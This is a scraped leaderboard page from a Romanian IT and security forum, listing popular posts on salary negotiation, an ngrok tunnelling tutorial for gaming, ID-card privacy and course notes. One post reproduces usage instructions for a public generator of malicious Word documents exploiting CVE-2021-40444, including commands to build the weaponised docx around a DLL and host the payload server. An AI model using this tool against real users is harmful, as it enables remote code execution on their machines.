Jump to content

Leaderboard

Popular Content

Showing content with the highest reputation on 09/25/21 in all areas

  1. Ironic... Acum câteva zile ți-a zis cineva efevtiv de win+L... Of ce trece timpul
    3 points
  2. Malicious docx generator to exploit CVE-2021-40444 (Microsoft Office Word Remote Code Execution) Creation of this Script is based on some reverse engineering over the sample used in-the-wild: 938545f7bbe40738908a95da8cdeabb2a11ce2ca36b0f6a74deda9378d380a52 (docx file) You need to install lcab first (sudo apt-get install lcab) Check REPRODUCE.md for manual reproduce steps If your generated cab is not working, try pointing out exploit.html URL to calc.cab Using First generate a malicious docx document given a DLL, you can use the one at test/calc.dll which just pops a calc.exe from a call to system() python3 exploit.py generate test/calc.dll http://<SRV IP> Once you generate the malicious docx (will be at out/) you can setup the server: sudo python3 exploit.py host 80 Finally try the docx in a Windows Virtual Machine: Download Link : https://github.com/lockedbyte/CVE-2021-40444
    1 point
  3. Si asa nu mai arati nici buletinul cand te duci sa votezi sau cand iti faci un contract cu banca? Iti cumperi un buletin cu crypto si il faci pe sediul cabinetului dentar? Nu e sanatos sa fii paranoic.
    1 point
  4. Am experienta de 6 ani in IT si toata experienta mea este pe partea de Network Engineering, asa ca la developer nu stiu ce sfaturi as putea sa dau. Dar pot sa dau un sfat general valabil. Eu de fiecare data cand sunt sunat sa programez un interviu le zic "eu nu vin sub X lei, daca bugetul este sub, nu va mai pierdeti timpul nici voi si nici eu". De obicei, un itist isi da seama de ce salariu va primi urmaring doua lucruri: experienta lui si jd-ul. S-a intamplat sa iau si cu 50% mai mult decat am zis ca e suma minima? Da. Deci ca sa spui suma sub care nu accepti negociere nu inseamna ca acel salariu il doresti. Asa ca va sfatuiesc si pe voi sa fiti transparenti. Traim in 2021, salariul nu mai este un tabu. Nu neaparat suma pe care o oferiti dar bugetul pe care il aveti. Daca voi aveti un buget de 5.000 de euro si candidatul este junior, va sti si el ca nu va lua 5.000 de euro. Dar daca prindeti un senior si dupa 4 interviuri ii spuneti ca aveti un buget de 1.500 de euro, va scuipa in fata. Eu asa as face.
    1 point
  5. Ce este NGROK? Dupa cum probabil stiti ca sa va jucati cu cineva care nu se afla in reteaua voastra aveti nevoie de open port. Un port deschis care sa fie folosit de jocul in care va aflati. (ex 27015, nu stau sa intru in alte detali.) Ca sa evitam bataia de cap cu port forwarding, putem folosi ngrok. Care va face un tcp "tunel" spre un port din localhost-ul tau. (Sper ca m-am exprimat corect, n-am stiut cum sa ma exprim altfel.) Cum se foloseste, de unde il downloadam? Link Download --> https://ngrok.com (Ne facem cont, putem folosit un temp mail.) Dupa ce am facut un cont si am downloadat ngrok, mergem in https://dashboard.ngrok.com/get-started si notam authoken-ul intr-un fisier.txt. Dupa deschidem ngrok si tastam urmatoarele comenzi: ngrok authoken (cod authoken) ngrok tcp (-region, ca sa alegem o regiune, ex -region eu) si portul de la sesiunea de gaming din lan. Copiam dns-ul si portul ce se afla dupa tcp:// si o dam amicului cu care vrem sa jucam. EDIT: Nu stiu daca aici trebuia sa pun postul, dar in cazul in care am gresit locul sper ca cineva din staff sa mute tutorial-ul in locul corect.
    1 point
  6. Programarea retelelor de calculatoare. Materie facuta in 2 ani diferiti, part1 = primul an, part2 = al doilea an. In mare parte, cam ce e in part2, e si in partea 1. https://drive.google.com/open?id=1tEbiZT6rYXgWgqFEydH3yPsEgOT-SzH9
    1 point
×
×
  • Create New...